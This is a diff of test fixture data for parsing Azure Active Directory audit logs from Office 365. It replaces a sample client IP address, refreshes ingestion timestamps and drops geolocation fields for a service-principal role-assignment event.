@@ -6284,12 +5726,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036256800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125008800Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -6315,25 +5757,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -6347,7 +5771,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -6483,7 +5907,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": { 
@@ -6495,12 +5919,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036262700Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125014300Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:26:05\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"206711cb-0722-49cc-a9ad-af7f34da9452\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:26:05.9992570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"0871Y\"},{\"Name\":\"env_seqNum\",\"Value\":\"46795878\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR530\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"41c7d7a7-ce53-4696-aa78-37c451a95fe1\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -6526,25 +5950,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
